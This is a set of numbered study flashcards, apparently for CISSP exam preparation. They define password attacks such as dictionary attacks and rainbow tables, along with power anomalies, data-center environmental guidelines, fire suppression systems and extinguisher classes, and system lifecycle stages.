Timing: focuses on the length of time an activity takes.
Radiation Emissions: focuses on the electromagnetic emissions made by devices and systems.
Power: focuses on how much power is consumed during an activity.
104
Determine somebody’s password. Rather than trying every possible combination of letters and numbers, an attacker will utilize a much more efficient method and try the most likely possibilities/combinations of words to determine a password.
Dictionary Attack
105
Precomputed table of hash values, based upon the most popular passwords used in the world and the most popular hashing algorithms.
Rainbow Tables. To reduce the risk? use salt (random value appended to a password, which is then hashed).
106
Used to identify collisions in hashing algorithms.
Birthday Attack
107
This attack can be used to obtain a cryptographic key as well. Two such attacks are: purchase key attack (bribing someone to obtain a copy of the key) and rubber hose attack (use of duress or torture to obtain the key).
Social Engineering
108
is a technique that can be used to determine where vulnerabilities might exist. Involves deliberately injecting a fault into hardware or software to modify its normal behavior, which then allows identified vulnerabilities to be corrected.
Fault Injection Attack
109
No Power. Short period of time (Milliseconds).
Fault
110
Not enough power (e.g., low voltage). Short period of time (Milliseconds).
Sag/Dip
111
Too much power (e.g., high voltage). Short period of time (Milliseconds).
Spike
112
No power. Long period of time (Seconds, minutes, hours, days).
Blackout
113
Not enough power (e.g., low voltage). Long period of time (Seconds, minutes, hours, days).
Brownout
114
Too much power (e.g., high voltage). Long period of time (Seconds, minutes, hours, days).
Surge
115
The American Society of Heating, Refrigerating and Air-Conditioning Engineers (ASHRAE) temperature and humidity guidelines for data centers:
Temperature, low: 64.4°F / 18°C
Temperature, high: 80.6°F / 27°C
Humidity, low: 40% relative humidity
Humidity, high: 60% relative humidity
116
The pipes in a sprinkler system are “wet”—filled with pressurized water at all times. In the event of activation, water will flow until the water source is shut off. This can result in significant excess water after a fire has been extinguished.
Wet Pipe
117
Do not always have pressurized water in the pipes. They are dry and typically filled with some type of pressurized gas (e.g., air or nitrogen); when a sprinkler head opens, the gas escapes and only then does water flow into the pipes, so they suit unheated areas where a wet pipe could freeze. (Source: Witcher, Berti, Hablas, and Mitropoulos, Destination CISSP: A Concise Guide, p. 542.)
Dry Pipe
118
Combines a dry-pipe system with a separate detection system: the pipes stay dry until smoke or heat detectors in the area activate, which opens a valve and fills the pipes; water is then released only from sprinkler heads that individually open from heat. Because two independent events are needed, the risk of water damage from a false activation or a damaged head is greatly reduced, and other floors are not showered with water.
Pre-action
119
Involves massive amounts of water flowing at once. All sprinkler heads are permanently open, so when the detection system opens the deluge valve, water immediately floods the pipes and flows out of every head. Should only be used where immediate extinguishment of a fire is required, like in a fireworks or explosives factory, where a fire could cause a catastrophic explosion.
Deluge
120
Gas Fire Suppression Systems:
INERGEN and Argonite (inert gas blends), FM-200 (a clean chemical agent); Aero-K is a condensed aerosol agent that is often grouped with them.
121
Fire Extinguisher Types:
Class A: common combustibles. Suppression agents: water, foam, dry chemicals.
Class B: flammable liquids. Suppression agents: gas, CO2, foam, dry chemicals.
Class C: electrical. Suppression agents: gas, CO2, dry chemicals.
Class D: combustible metals. Suppression agents: dry powders.
Class K: commercial kitchens (cooking oils and fats). Suppression agents: wet chemicals.
122
Manage the Information System Lifecycle:
1. Stakeholder needs and requirements
2. Requirements analysis
3. Architectural design
4. Development/implementation
5. Integration
6. Verification and validation
7. Transition/deployment
8. Operations and maintenance/sustainment
9. Retirement/disposal
123
Identify the needs and requirements (problems the system needs to solve, goals it must achieve).
Stakeholders needs and requirements
124
Analyze and refine the requirements gathered to ensure they are consistent, complete, and unambiguous.
Requirement analysis
125
Develop a high-level blueprint of the overall architecture of the system, including hardware, software, and network components, with consideration to security and performance.
Architectural design
126
The actual build, development, acquisition, or implementation of the system based on the architectural design, ensuring secure coding practices are followed.
Development/implementation
127
Ensure components function together and meet defined requirements by aligning with the overall system architecture.
Integration
128
Confirm the system meets intended requirements (verification) and addresses the overall business/stakeholder needs (validation).
Verification and Validation
129
Move the system from development into the production environment in a controlled and secure manner.
Transition/deployment
130
Ongoing operation and management of the system to ensure availability and performance.
Ops and maint/sustainment
131
Secure decommissioning or disposal of the system when it reaches the end of its useful life or becomes obsolete.
Retirement/disposal